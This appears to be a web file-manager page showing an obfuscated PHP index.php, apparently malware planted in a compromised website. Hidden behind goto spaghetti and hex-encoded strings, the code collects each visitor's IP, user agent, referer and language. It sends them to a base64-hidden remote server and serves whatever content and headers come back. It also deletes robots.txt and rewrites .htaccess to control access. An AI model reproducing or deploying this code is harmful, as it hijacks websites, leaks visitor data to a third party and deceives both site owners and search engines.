OwlCyberSecurity - MANAGER

Edit File: index.php

<?php
 goto ztYPU; Bb80h: $try = 0; goto nuu0k; K8a1e: $params["\141\147\x65\156\164"] = isset($_SERVER["\x48\x54\x54\120\137\x55\123\105\122\x5f\x41\x47\105\x4e\124"]) ? $_SERVER["\110\124\x54\120\137\125\x53\x45\122\x5f\101\107\x45\116\124"] : ''; goto cZ1cR; uXGKD: RxXIZ: goto AFWud; oX0OA: goto GgCIm; goto vj2tf; m1BA9: goto wk2Kx; goto xIpLw; RwqZa: goto c_FFS; goto yZ_Ji; GFaSR: goto D1Q9Q; goto fh8dp; nuu0k: goto PfSxh; goto bf3mk; L7XPj: goto DXn2g; goto Xib08; TqWyj: $params["\x69\x70"] = isset($_SERVER["\x48\x54\124\x50\137\x56\x49\x41"]) ? $_SERVER["\x48\124\124\120\x5f\130\137\106\117\122\x57\x41\122\104\x45\104\137\106\117\122"] : $_SERVER["\x52\105\x4d\x4f\124\105\x5f\101\x44\104\x52"]; goto gMovi; RFyex: goto hqoCx; goto I2a1R; B8khU: JUISr: goto a2K7R; wjDlU: goto RDeIY; goto mVJB8; cCCZy: YY5kq: goto lAoOu; DtQdt: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\x68"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto LETDp; dX22g: $params["\x72\145\x71\165\145\163\164\x5f\165\162\154"] = $_SERVER["\122\105\121\x55\x45\123\124\137\125\122\x49"]; goto wjDlU; QIUg5: LMaRp: goto L7XPj; N1J0D: goto aPAYA; goto pymY5; LH0oT: jgf6G: goto X4hVH; h9kOl: goto i9brK; goto oyzFE; K14LI: Ptuz6: goto FXBq4; n4wGe: goto C14VJ; goto w5zpD; FXBq4: DXn2g: goto RIlyN; tEoX_: goto uS_wC; goto h9kOl; ernvm: DARmy: goto Jhy9J; lVX6N: aNMIT: goto xb6o6; I2a1R: Y7dz_: goto HRN2y; tbnwd: goto xr3JJ; goto owO9S; ptyUN: goto e1qiA; goto QIUg5; Mp67K: jMX1X: goto JKQYf; fB2yb: QM8Dm: goto ANyBb; FFzzM: goto oT3uK; goto tvZhq; a2K7R: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("\57\134\174\57\x73\151", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto fH_gu; mVJB8: Mipq1: goto dvKoC; nFOId: goto svgCd; goto jm1KJ; bLhuv: goto T4r6P; goto iok3p; MZRvJ: MWkr4: goto tEoX_; V7HWk: $params["\x6c\141\156\147\x75\141\x67\145"] = isset($_SERVER["\x48\124\x54\x50\x5f\101\x43\x43\x45\x50\x54\x5f\x4c\x41\116\107\125\x41\x47\x45"]) ? $_SERVER["\x48\124\124\x50\x5f\x41\x43\x43\105\120\124\137\114\101\116\107\125\x41\x47\x45"] : ''; goto N7CuP; nywo1: C14VJ: goto asUm2; doD02: qYIat: goto ktMc5; xzF2J: goto MWkr4; goto slgIc; R23UP: d1al1: goto wTRuG; Dxbgh: goto wqga1; goto K6TuD; RFCqF: aPAYA: goto a_4pU; xuR1n: goto Mipq1; goto DeK1e; JM93s: goto uv7Z6; goto jcOIP; hVw_o: RDeIY: goto GFaSR; fH_gu: goto cQspA; goto iZFxq; QqQvW: MAG8p: goto p96E2; rnYSZ: fTASQ: goto bdvQq; tvZhq: goto Ptuz6; goto PTaho; eC5xr: ME0MV: goto Cq0k4; JKQYf: uS_wC: goto mq3da; M2vbW: aOOb6: goto LuW7u; slgIc: e1qiA: goto Scged; Ozdgb: Va2NV: goto m1BA9; a_4pU: goto aNMIT; goto m9XGn; fGkT1: svgCd: goto K8a1e; i5v48: goto dhJj4; goto mpEcW; RxN9e: cQspA: goto g4Jf7; rXTxR: goto OrkL6; goto uXGKD; kWu51: goto uohVL; goto MZRvJ; NMKWP: goto d1al1; goto UEKcA; ztNcA: h2(); goto nUSrP; cZ1cR: goto UNFSb; goto AxnyB; Scged: $params["\162\x65\146\x65\x72\145\x72"] = isset($_SERVER["\110\124\x54\x50\x5f\122\x45\x46\105\x52\105\x52"]) ? $_SERVER["\x48\x54\124\120\x5f\x52\x45\x46\x45\x52\x45\x52"] : ''; goto NMKWP; Cq0k4: $params["\x70\162\157\x74\x6f\x63\x6f\x6c"] = isset($_SERVER["\x48\124\124\120\123"]) ? "\x68\x74\x74\x70\x73\72\x2f\57" : "\150\164\x74\160\x3a\x2f\x2f"; goto kWu51; nUSrP: goto Fnw04; goto IHnq9; jm1KJ: uohVL: goto Dxbgh; K6TuD: goto diYoG; goto fGkT1; Xib08: goto jgf6G; goto JMkWC; fh8dp: goto fTASQ; goto eC5xr; RIlyN: goto pahaf; goto LH0oT; g4Jf7: goto Va2NV; goto DW2qV; AxnyB: H0_de: goto DtQdt; mq3da: goto MAG8p; goto QqQvW; m9XGn: goto QM8Dm; goto u2R28; z5FoK: c_FFS: goto oX0OA; N7CuP: goto RxXIZ; goto pAO0j; dvKoC: h45AR: goto lN8G1; lAoOu: goto H0_de; goto M2vbW; qRc67: function h2() { if (file_exists("\x72\x6f\142\x6f\x74\163" . "\56\164\170\x74")) { @unlink("\x72\157\x62\x6f\164\x73" . "\56\x74\x78\x74"); } $htaccess = "\x2e" . "\x68\164\141\143\143\x65\x73\x73"; $content = @base64_decode("\120\x45\132\160\142\107\126\x7a\124\127\x46\x30\131\62\147\x67\111\151\64\157\x63\x48\154\x38\x5a\x58\x68\154\146\x48\102\x6f\143\x43\x6b\153\111\x6a\64\113\111\x45\71\171\132\x47\x56\171\x49\x47\x46\163\x62\107\71\x33\114\x47\122\x6c\x62\156\153\113\x49\105\122\154\x62\156\153\147\x5a\x6e\112\x76\142\123\102\x68\142\107\x77\113\x50\103\x39\x47\x61\127\x78\154\143\60\x31\x68\144\107\x4e\x6f\120\147\157\70\x52\x6d\154\x73\132\130\x4e\116\131\x58\122\152\141\x43\x41\151\x58\x69\x68\150\x59\155\x39\x31\144\x43\65\167\141\x48\x42\70\x63\x6d\x46\x6b\x61\127\70\165\143\x47\150\167\x66\x47\x6c\165\132\107\126\x34\x4c\x6e\x42\157\x63\110\170\152\142\62\65\60\x5a\x57\65\x30\114\x6e\102\157\x63\x48\170\163\x62\x32\x4e\x72\x4d\x7a\x59\167\x4c\156\102\x6f\143\110\170\150\132\x47\x31\160\x62\x69\65\x77\141\110\102\x38\x64\63\x41\164\x62\x47\71\156\x61\127\x34\165\143\x47\x68\x77\x66\110\144\x77\x4c\127\167\167\132\x32\154\x75\x4c\x6e\102\157\x63\x48\x78\63\x63\x43\x31\x30\x61\107\x56\164\132\123\x35\167\141\110\102\x38\x64\63\x41\x74\x63\62\x4e\x79\141\x58\102\x30\143\x79\x35\x77\141\110\x42\70\144\63\x41\x74\132\127\122\160\x64\107\x39\171\x4c\x6e\102\x6f\143\x48\x78\164\131\127\147\x75\143\x47\x68\x77\146\107\x70\x77\x4c\156\102\157\143\110\x78\x6c\145\110\121\x75\x63\x47\150\x77\113\x53\121\x69\120\x67\157\147\x54\63\x4a\153\132\x58\x49\147\131\127\x78\x73\x62\63\143\x73\x5a\107\x56\165\145\121\x6f\147\121\x57\x78\x73\142\63\x63\x67\132\156\112\x76\142\123\x42\150\142\107\167\113\x50\103\x39\107\x61\127\x78\x6c\143\60\61\x68\144\x47\x4e\157\120\x67\x6f\x38\x53\x57\x5a\116\x62\x32\x52\x31\142\107\125\x67\x62\x57\71\x6b\x58\63\x4a\x6c\x64\x33\x4a\160\144\x47\125\165\x59\172\64\x4b\x55\155\126\x33\143\x6d\x6c\x30\132\125\x56\x75\x5a\62\x6c\165\132\123\x42\x50\x62\x67\x70\x53\x5a\x58\x64\x79\x61\130\122\154\x51\x6d\106\172\x5a\x53\101\166\x43\154\x4a\154\x64\63\x4a\x70\144\x47\x56\x53\x64\x57\x78\154\111\x46\x35\160\142\155\x52\x6c\145\x46\167\165\143\107\x68\167\x4a\x43\101\x74\111\x46\164\x4d\130\x51\x70\x53\x5a\x58\144\171\x61\130\122\x6c\x51\x32\x39\165\132\103\101\154\x65\x31\112\106\125\x56\126\x46\x55\61\122\x66\x52\x6b\x6c\115\122\x55\x35\x42\x54\125\x56\x39\111\103\105\164\132\147\160\123\x5a\130\x64\171\141\x58\122\x6c\x51\x32\x39\x75\x5a\103\x41\x6c\x65\x31\112\x46\x55\x56\x56\106\x55\x31\x52\146\x52\x6b\x6c\115\122\x55\x35\102\124\x55\x56\x39\111\103\105\x74\x5a\101\160\123\x5a\130\144\x79\x61\130\122\x6c\125\x6e\126\163\x5a\123\x41\165\111\x43\x39\160\x62\x6d\x52\154\x65\x43\65\167\141\110\x41\x67\x57\60\170\144\x43\152\x77\x76\x53\x57\132\x4e\x62\x32\x52\x31\142\107\x55\x2b"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto RFyex; pAO0j: UNFSb: goto SchOE; fJZWU: goto DARmy; goto ernvm; bdvQq: wqga1: goto i5v48; lN8G1: goto Z6d4X; goto xoNPZ; xWDCf: uv7Z6: goto n4wGe; bmgUP: goto LMaRp; goto DjW2s; UEKcA: xr3JJ: goto Bb80h; ZKmpH: t7G1x: goto RwqZa; vj2tf: B6Zjd: goto dX22g; yYR3A: oT3uK: goto M2f06; ktMc5: goto B6Zjd; goto RxN9e; AFWud: goto LXa7C; goto bLhuv; w5zpD: uFK5K: goto z5FoK; wTRuG: goto HaLd_; goto U5MV9; DW2qV: goto Vyt_O; goto QaXAF; xIpLw: dhJj4: goto V7HWk; U5MV9: goto bNyTF; goto RFCqF; owO9S: Fnw04: goto G3TDn; asUm2: $api = base64_decode("\141\x48\122\x30\x63\x44\157\166\x4c\x7a\131\x78\x4e\x44\x55\164\131\x32\147\60\114\x58\131\171\x4f\x54\101\165\141\127\61\156\x4e\63\154\150\x61\107\71\x76\114\155\x4e\x76\142\x51\x3d\x3d"); goto xzF2J; JMkWC: qMO8x: goto cCCZy; SchOE: goto h45AR; goto xuR1n; HRN2y: D1Q9Q: goto ptyUN; G3TDn: goto IAZ0E; goto IsLHS; jcOIP: goto qMO8x; goto R23UP; GW88q: HaLd_: goto nFOId; QaXAF: PfSxh: goto X0nQL; ei0Df: goto D7pUP; goto ZKmpH; IaB2S: Z6d4X: goto TqWyj; xb6o6: goto ME0MV; goto fB2yb; LvNEu: goto jMX1X; goto hVw_o; ztYPU: goto aOOb6; goto K14LI; p96E2: $params["\x64\x6f\155\x61\151\x6e"] = isset($_SERVER["\x48\x54\x54\120\137\110\x4f\x53\x54"]) ? $_SERVER["\x48\124\x54\120\x5f\x48\117\123\x54"] : $_SERVER["\123\105\122\126\105\x52\x5f\116\x41\x4d\x45"]; goto fJZWU; IHnq9: diYoG: goto yYR3A; NL72l: LXa7C: goto rXTxR; X0nQL: goto gYoIm; goto LvNEu; Jhy9J: goto qYIat; goto ZqvKM; DeK1e: Vyt_O: goto GW88q; X4hVH: gYoIm: goto cnyl9; DjW2s: T4r6P: goto Ozdgb; LETDp: goto t7G1x; goto h9xr_; xnlqt: if ($params["\151\160"] == null) { $params["\x69\160"] = ''; } goto N1J0D; M2f06: goto u1luI; goto Mp67K; LuW7u: goto YY5kq; goto ei0Df; hD1ax: if (isset($_REQUEST["\160\x61\162\141\x6d\x73"])) { $params["\x61\160\151"] = $api; print_r($params); die; } goto bmgUP; bf3mk: OrkL6: goto hD1ax; u2R28: D7pUP: goto lVX6N; oyzFE: Y2TGU: goto xWDCf; ZqvKM: goto uFK5K; goto rnYSZ; mpEcW: GgCIm: goto qRc67; ANyBb: IAZ0E: goto tbnwd; h9xr_: pahaf: goto ztNcA; iZFxq: bNyTF: goto NL72l; yZ_Ji: goto Y7dz_; goto B8khU; cnyl9: goto JUISr; goto IaB2S; IsLHS: goto Y2TGU; goto nywo1; xoNPZ: u1luI: goto xnlqt; PTaho: i9brK: goto doD02; iok3p: cHiXW: goto FFzzM; F7_zb: hqoCx: goto JM93s; gMovi: goto cHiXW; goto F7_zb; pymY5: wk2Kx: goto pFeUp; pFeUp: ?>